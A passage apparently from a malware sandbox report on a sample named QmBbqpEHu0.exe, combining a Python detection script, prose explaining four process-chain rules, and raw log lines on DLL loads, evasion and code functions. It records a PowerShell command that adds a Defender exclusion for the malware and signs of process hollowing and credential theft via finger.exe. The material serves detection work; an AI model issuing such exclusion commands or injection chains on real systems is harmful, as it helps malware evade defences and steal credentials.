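              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\QmBbqpEHu0.exe",
              r"C:\Users\user\Desktop\QmBbqpEHu0.exe",
              r'"C:\Users\user\Desktop\QmBbqpEHu0.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(r"C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe",
              r"C:\Windows\SysWOW64\finger.exe",
              r'"C:\Windows\SysWOW64\finger.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\finger.exe",
              r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WINDOWS_DIR = ("c:\\windows\\",)
# Parents that legitimately start console utilities and browsers.  This is an
# assumption for the example, not a complete list; tune it per environment.
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                 "services.exe", "svchost.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}

# Plain-text Add-MpPreference with any of the three exclusion switches; the
# excluded value is captured up to the closing quote (quote paths with spaces).
MPPREF_RE = re.compile(
    r'Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+"?([^"]+)', re.I)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _under(path, prefixes):
    p = path.lower()
    return any(p.startswith(x) for x in prefixes)


def detect(events):
    """Run the four rules over process-creation events; returns (rule, event) pairs."""
    findings = []
    for ev in events:
        parent, child = _base(ev.parent), _base(ev.child)

        # 1. Defender exclusion added from the command line.  The strongest
        #    form is the parent excluding its own image path.
        if child in ("powershell.exe", "pwsh.exe"):
            m = MPPREF_RE.search(ev.cmdline)
            if m:
                excluded = m.group(1).strip().lower()
                rule = ("defender_self_exclusion" if excluded == ev.parent.lower()
                        else "defender_exclusion_added")
                findings.append((rule, ev))

        # 2. A process starting an identical copy of itself: the usual prelude
        #    to overwriting a suspended child with another image (hollowing).
        if ev.parent.lower() == ev.child.lower():
            findings.append(("self_spawn_possible_hollowing", ev))

        # 3. A System32/SysWOW64 binary started by a parent that is neither a
        #    Windows component nor a known shell: third-party code driving a
        #    built-in utility.
        if (_under(ev.child, SYSTEM_DIRS) and not _under(ev.parent, WINDOWS_DIR)
                and parent not in SHELL_PARENTS):
            findings.append(("windows_binary_from_unusual_parent", ev))

        # 4. A utility living in a system directory launching a browser, which
        #    is how an injected stealer gets at the browser's saved logins.
        if (_under(ev.parent, SYSTEM_DIRS) and parent not in SHELL_PARENTS
                and child in BROWSERS):
            findings.append(("browser_launched_by_system_utility", ev))
    return findings


def rule_names(events):
    return [rule for rule, _ in detect(events)]


if __name__ == "__main__":
    for rule, ev in detect(EVENTS):
        print(f"{rule:36s} {_base(ev.parent)} -> {_base(ev.child)}")
```

On the report's five events the rules fire five times: the self-exclusion and the PowerShell launch on the first event, the self-spawn on the second, nothing on conhost.exe (its parent is a Windows component), finger.exe started from Program Files (x86) on the fourth, and finger.exe starting Firefox on the last. Rule 1 is the one to wire into an alert with the excluded path attached, because a Defender exclusion written by a freshly downloaded binary has no benign reading; rules 2 to 4 are cheap corroboration that lifts a single PowerShell hit into a process chain worth pulling memory for.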
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: QmBbqpEHu0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: QmBbqpEHu0.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: QmBbqpEHu0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: HszP.pdbSHA256 source: QmBbqpEHu0.exe
                Source: Binary string: finger.pdb source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cqvjCApYGBKzop.exe, 00000009.00000002.3586427956.000000000097E000.00000002.00000001.01000000.0000000D.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000000.2358690186.000000000097E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: HszP.pdb source: QmBbqpEHu0.exe
                Source: Binary string: wntdll.pdbUGP source: QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QmBbqpEHu0.exe, QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747DDE0 push eax; retf | 0_2_0747DDE1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0041605F push ecx; iretd | 4_2_00416097
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00416063 push ecx; iretd | 4_2_00416097
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00416833 push edx; iretd | 4_2_00416835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00414884 push FFFFFFEBh; iretd | 4_2_00414887
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_004018BF push ds; ret | 4_2_004018C8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00412118 push esi; retf | 4_2_00412119
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0040DA11 push ecx; retf | 4_2_0040DA30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_004022BC push ds; ret | 4_2_004022BD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00415B50 push ebx; ret | 4_2_00415B5D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00415B53 push ebx; ret | 4_2_00415B5D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00415BC8 push es; ret | 4_2_00415BEA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0040DBAD push cs; retf | 4_2_0040DBAE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00415C27 push es; ret | 4_2_00415BEA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_004034A0 push eax; ret | 4_2_004034A2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_004145C0 push esi; iretd | 4_2_004145AC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00414595 push esi; iretd | 4_2_004145AC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00404E54 pushad ; retf | 4_2_00404E66
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00414E5A push D3374C68h; ret | 4_2_00414E6C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00417E9B pushfd ; iretd | 4_2_00417E9D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00411F0E push C2AE7667h; retf | 4_2_00411F15
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FC09AD push ecx; mov dword ptr [esp], ecx | 4_2_00FC09B6
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034B225F pushad ; ret | 10_2_034B27F9
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034B27FA pushad ; ret | 10_2_034B27F9
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034E09AD push ecx; mov dword ptr [esp], ecx | 10_2_034E09B6
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034B283D push eax; iretd | 10_2_034B2858
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034B135E push eax; iretd | 10_2_034B1369
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C41C0 pushfd ; retf AE7Ch | 10_2_009C4308
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009BC3A5 push edi; iretd | 10_2_009BC3A6
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C2570 push esi; retf E201h | 10_2_009C25E4
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009B26B0 push ebx; ret | 10_2_009B26BA
                Source: QmBbqpEHu0.exe | Static PE information: section name: .text entropy: 7.659098571397496

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: QmBbqpEHu0.exe PID: 7432, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: E10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: 2940000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: 8F70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: 9F70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: A190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: B190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: B5C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: C5C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Memory allocated: D5C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Code function: 4_2_0100096E rdtsc 4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Thread delayed: delay time: 240000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4952
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 481
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe TID: 7468 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe TID: 7468 Thread sleep time: -240000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe TID: 2916 Thread sleep count: 34 > 30
                Source: C:\Windows\SysWOW64\finger.exe TID: 2916 Thread sleep time: -68000s >= -30000s
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe TID: 2484 Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exe Code function: 10_2_009BC9E0 FindFirstFileW,FindNextFileW,FindClose, 10_2_009BC9E0
